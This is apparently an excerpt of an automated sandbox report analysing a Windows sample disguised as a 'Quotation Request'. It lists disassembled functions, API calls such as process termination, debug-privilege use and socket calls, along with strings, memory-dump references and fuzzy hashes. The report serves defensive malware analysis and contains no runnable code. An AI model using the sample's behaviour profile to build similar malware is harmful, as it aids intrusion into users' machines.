                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                      • String ID:
                                                      • API String ID: 1957940570-0
                                                      • Opcode ID: 8501b8ff95cb0b935aee3b879608ff96fceaf4965d90e94bff2f8d7409a0a87b
                                                      • Instruction ID: fcd391cf8d9127a1764ac62d741387bbebadea94bed1d362db53c82b15379519
                                                      • Opcode Fuzzy Hash: 8501b8ff95cb0b935aee3b879608ff96fceaf4965d90e94bff2f8d7409a0a87b
                                                      • Instruction Fuzzy Hash: 2C01ACB5280704FFE711ABA5DC49F6B3B6CFB89711F404421FB05DB191CA7498048A21
                                                      Function 00849B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                      • API String ID: 0-572801152
                                                      • Opcode ID: 2f6be5ac5058e83239cc08b4b768ba0b88688f9d7a041478cd6a01d6655fb0bf
                                                      • Instruction ID: ab3e154fe088d049a9f61d3a184e4c9a2aec7a9d92fe0310a9fa0f96378c2a6d
                                                      • Opcode Fuzzy Hash: 2f6be5ac5058e83239cc08b4b768ba0b88688f9d7a041478cd6a01d6655fb0bf
                                                      • Instruction Fuzzy Hash: 92C18071A0021E9BDF20DFA8D884BAFB7F5FB48314F158469E945EB281E770AD45CB90
                                                      Function 00849113 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearInit$_memset
                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                      • API String ID: 2862541840-625585964
                                                      • Opcode ID: 8f4a38753b37bcdde6e196d202625deff7eaaeaf18d05339068801109c142ddb
                                                      • Instruction ID: 2813357c0b500ba367fa58672897ab177dcb8eb505e800830800517a41aa7eb3
                                                      • Opcode Fuzzy Hash: 8f4a38753b37bcdde6e196d202625deff7eaaeaf18d05339068801109c142ddb
                                                      • Instruction Fuzzy Hash: 76918871A00219EBDF34DFA5C848EAFBBB8FF86714F10815AE555EB280D7749905CBA0
                                                      Function 0084975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0082710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00827044,80070057,?,?,?,00827455), ref: 00827127
                                                        • Part of subcall function 0082710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00827044,80070057,?,?), ref: 00827142
                                                        • Part of subcall function 0082710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00827044,80070057,?,?), ref: 00827150
                                                        • Part of subcall function 0082710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00827044,80070057,?), ref: 00827160
                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00849806
                                                      • _memset.LIBCMT ref: 00849813
                                                      • _memset.LIBCMT ref: 00849956
                                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00849982
                                                      • CoTaskMemFree.OLE32(?), ref: 0084998D
                                                      Strings
                                                      • NULL Pointer assignment, xrefs: 008499DB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                      • String ID: NULL Pointer assignment
                                                      • API String ID: 1300414916-2785691316
                                                      • Opcode ID: 4250440a84dfa549473bee1884ec18ff176ba8bc34e0c8d53f68daa3746f5576
                                                      • Instruction ID: e4dac816febbc885156ce53254c5d5f4ee3e2b02f595aad08d5b1502571708d2
                                                      • Opcode Fuzzy Hash: 4250440a84dfa549473bee1884ec18ff176ba8bc34e0c8d53f68daa3746f5576
                                                      • Instruction Fuzzy Hash: 97912671D0022DEBDB20DFA5DC45ADEBBB9FF08310F10416AE519A7281EB359A44CFA0
                                                      Function 00856D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00856E24
                                                      • SendMessageW.USER32(?,00001036,00000000,?), ref: 00856E38
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00856E52
                                                      • _wcscat.LIBCMT ref: 00856EAD
                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 00856EC4
                                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00856EF2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window_wcscat
                                                      • String ID: SysListView32
                                                      • API String ID: 307300125-78025650
                                                      • Opcode ID: c9657129040e1069c4105e0e127409b7591ac86843225378e56fdd553f4164c4
                                                      • Instruction ID: a0dceb88cfead64461c3a94676f3e05df7fbd3c9f2c966a9ec0c9d0a3df6f855
                                                      • Opcode Fuzzy Hash: c9657129040e1069c4105e0e127409b7591ac86843225378e56fdd553f4164c4
                                                      • Instruction Fuzzy Hash: E041A470A00348ABDB219FA4CC85BEE77F9FF08351F50046AFA54D7291E6769D98CB60
                                                      Function 0084E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00833C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00833C7A
                                                        • Part of subcall function 00833C55: Process32FirstW.KERNEL32(00000000,?), ref: 00833C88
                                                        • Part of subcall function 00833C55: CloseHandle.KERNEL32(00000000), ref: 00833D52
                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0084E9A4
                                                      • GetLastError.KERNEL32 ref: 0084E9B7
                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0084E9E6
                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 0084EA63
                                                      • GetLastError.KERNEL32(00000000), ref: 0084EA6E
                                                      • CloseHandle.KERNEL32(00000000), ref: 0084EAA3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                      • String ID: SeDebugPrivilege
                                                      • API String ID: 2533919879-2896544425
                                                      • Opcode ID: 3570fbf6a3bd9a3283e4c85f2940b6383aedb6135caa419bae8ea2fede493301
                                                      • Instruction ID: e99a72d3c6d10014ff66a05b674787dea9e548a3004dd461bf8a73141d46cfd2
                                                      • Opcode Fuzzy Hash: 3570fbf6a3bd9a3283e4c85f2940b6383aedb6135caa419bae8ea2fede493301
                                                      • Instruction Fuzzy Hash: 3141A9302002149FDB11EF28CCA9F6EBBA5FF54714F048459FA029B3D2DB78A844CB92
                                                      Function 00832F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadIconW.USER32(00000000,00007F03), ref: 00833033
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: IconLoad
                                                      • String ID: blank$info$question$stop$warning
                                                      • API String ID: 2457776203-404129466
                                                      • Opcode ID: 35b07f952a68a89ca90cc5d737406f7a2500a13055504a818b558eff135497c0
                                                      • Instruction ID: 5c036c511b16a1882994b1170fd997c067dbbca0c30125bb5bbe44b0706ae081
                                                      • Opcode Fuzzy Hash: 35b07f952a68a89ca90cc5d737406f7a2500a13055504a818b558eff135497c0
                                                      • Instruction Fuzzy Hash: A7110831248B4AFAEB289B54DC96C6B679CFF55324F60002AFA10E6282DB685F4056E4
                                                      Function 008342F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00834312
                                                      • LoadStringW.USER32(00000000), ref: 00834319
                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0083432F
                                                      • LoadStringW.USER32(00000000), ref: 00834336
                                                      • _wprintf.LIBCMT ref: 0083435C
                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0083437A
                                                      Strings
                                                      • %s (%d) : ==> %s: %s %s, xrefs: 00834357
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: HandleLoadModuleString$Message_wprintf
                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                      • API String ID: 3648134473-3128320259
                                                      • Opcode ID: 523517b328a8e888c1ecc346f21b7cffbfb9f4180fa78859167d28992b927444
                                                      • Instruction ID: aadc1ff02ae0f92a012c0dc8d091833b6d509d965a5b4df0c7441ae74babc5a5
                                                      • Opcode Fuzzy Hash: 523517b328a8e888c1ecc346f21b7cffbfb9f4180fa78859167d28992b927444
                                                      • Instruction Fuzzy Hash: 0C014FF2940308BFE711A7A0DD89EEB776CFB08302F4005A1BB45E2152EA786E854B70
                                                      Function 0085D43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 007D2612: GetWindowLongW.USER32(?,000000EB), ref: 007D2623
                                                      • GetSystemMetrics.USER32(0000000F), ref: 0085D47C
                                                      • GetSystemMetrics.USER32(0000000F), ref: 0085D49C
                                                      • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0085D6D7
                                                      • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0085D6F5
                                                      • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0085D716
                                                      • ShowWindow.USER32(00000003,00000000), ref: 0085D735
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0085D75A
                                                      • DefDlgProcW.USER32(?,00000005,?,?), ref: 0085D77D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                      • String ID:
                                                      • API String ID: 1211466189-0
                                                      • Opcode ID: 78b169f3cecbf84670d657911e43a92921e81f531f11bc8fc5ee82b30d32cf62
                                                      • Instruction ID: 9cbc63e3ee634d10343fa9bda4641ebfbb33debf2398081c123ef432ab58aeeb
                                                      • Opcode Fuzzy Hash: 78b169f3cecbf84670d657911e43a92921e81f531f11bc8fc5ee82b30d32cf62
                                                      • Instruction Fuzzy Hash: 01B16975600219EFDF24CF68C9857AA7BF1FF08712F088069ED48DA295E734A959CB90
                                                      Function 007D2A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0080C1C7,00000004,00000000,00000000,00000000), ref: 007D2ACF
                                                      • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0080C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 007D2B17
                                                      • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0080C1C7,00000004,00000000,00000000,00000000), ref: 0080C21A
                                                      • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0080C1C7,00000004,00000000,00000000,00000000), ref: 0080C286
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ShowWindow
                                                      • String ID:
                                                      • API String ID: 1268545403-0
                                                      • Opcode ID: 95956d6fac2905c9308a521e77abb3c11f5b6ffe4b5ff1b1c770c2de88e205d2
                                                      • Instruction ID: 44cadc695920982919f35b62c6bfe8644efadbf23a64dbcac730b801a98968fe
                                                      • Opcode Fuzzy Hash: 95956d6fac2905c9308a521e77abb3c11f5b6ffe4b5ff1b1c770c2de88e205d2
                                                      • Instruction Fuzzy Hash: 5541B730704780AACB759B288C88B6B7BB2FBE5311F58C51BE546867A3C67D9843D711
                                                      Function 008370C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 008370DD
                                                        • Part of subcall function 007F0DB6: std::exception::exception.LIBCMT ref: 007F0DEC
                                                        • Part of subcall function 007F0DB6: __CxxThrowException@8.LIBCMT ref: 007F0E01
                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00837114
                                                      • EnterCriticalSection.KERNEL32(?), ref: 00837130
                                                      • _memmove.LIBCMT ref: 0083717E
                                                      • _memmove.LIBCMT ref: 0083719B
                                                      • LeaveCriticalSection.KERNEL32(?), ref: 008371AA
                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 008371BF
                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 008371DE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                      • String ID:
                                                      • API String ID: 256516436-0
                                                      • Opcode ID: 8c543b0d8527aec9889dfbd8fc511f9fffc175c153d04f8fff86edd3b90d972b
                                                      • Instruction ID: 4ca47a8b173353b6790557af892bff023d7e4bf5dc45517df21680b76f9c3f90
                                                      • Opcode Fuzzy Hash: 8c543b0d8527aec9889dfbd8fc511f9fffc175c153d04f8fff86edd3b90d972b
                                                      • Instruction Fuzzy Hash: C8315E76900209EBCF10EFA4DC899AEBB78FF45711F1441A5EA04EB356DB74DA14CBA0
                                                      Function 008561D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DeleteObject.GDI32(00000000), ref: 008561EB
                                                      • GetDC.USER32(00000000), ref: 008561F3
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 008561FE
                                                      • ReleaseDC.USER32(00000000,00000000), ref: 0085620A
                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00856246
                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00856257
                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0085902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00856291
                                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 008562B1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                      • String ID:
                                                      • API String ID: 3864802216-0
                                                      • Opcode ID: 1584791b9945e6542874508589e35ea5dab10d8507bb590be910bb7fd7140c51
                                                      • Instruction ID: 2e2dd0bc44ee8f109036815aad7fa33b18370f6296973d70f756de69da35284c
                                                      • Opcode Fuzzy Hash: 1584791b9945e6542874508589e35ea5dab10d8507bb590be910bb7fd7140c51
                                                      • Instruction Fuzzy Hash: CF315C72101610BFEB118F508C8AFAB3BA9FF59766F044065FE08DA192D6799851CB60
                                                      Function 0082BBAF Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: _memcmp
                                                      • String ID:
                                                      • API String ID: 2931989736-0
                                                      • Opcode ID: 8606b70c915a0f17536d2d3d674ea89e97a901337771c37c31ad6499e53c34c6
                                                      • Instruction ID: ed1bd4ce5002ee95441bf5594e5550ddd9066c80a0a696298abb5d1b672d8121
                                                      • Opcode Fuzzy Hash: 8606b70c915a0f17536d2d3d674ea89e97a901337771c37c31ad6499e53c34c6
                                                      • Instruction Fuzzy Hash: 6C21A46160266EFBE6046611BD42FBB775DFF60368F084020FE04D6B87EB68DE5181A1
                                                      Function 0083EB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 007D9837: __itow.LIBCMT ref: 007D9862
                                                        • Part of subcall function 007D9837: __swprintf.LIBCMT ref: 007D98AC
                                                        • Part of subcall function 007EFC86: _wcscpy.LIBCMT ref: 007EFCA9
                                                      • _wcstok.LIBCMT ref: 0083EC94
                                                      • _wcscpy.LIBCMT ref: 0083ED23
                                                      • _memset.LIBCMT ref: 0083ED56
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                      • String ID: X
                                                      • API String ID: 774024439-3081909835
                                                      • Opcode ID: 4ca6a62c91239df5a6cbc9d26a3725fb9c3c66c92eadb8befbb436fd753a7233
                                                      • Instruction ID: 3d5ac982735b93d83dd7762831b48da73402253c4abbc812ffa09a4ef5d4b9d3
                                                      • Opcode Fuzzy Hash: 4ca6a62c91239df5a6cbc9d26a3725fb9c3c66c92eadb8befbb436fd753a7233
                                                      • Instruction Fuzzy Hash: F8C13971508644DFC754EF28C889A6AB7F4FF85310F10492EF9999B3A2DB74E845CB82
                                                      Function 00846B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00846C00
                                                      • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00846C21
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00846C34
                                                      • htons.WSOCK32(?,?,?,00000000,?), ref: 00846CEA
                                                      • inet_ntoa.WSOCK32(?), ref: 00846CA7
                                                        • Part of subcall function 0082A7E9: _strlen.LIBCMT ref: 0082A7F3
                                                        • Part of subcall function 0082A7E9: _memmove.LIBCMT ref: 0082A815
                                                      • _strlen.LIBCMT ref: 00846D44
                                                      • _memmove.LIBCMT ref: 00846DAD
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
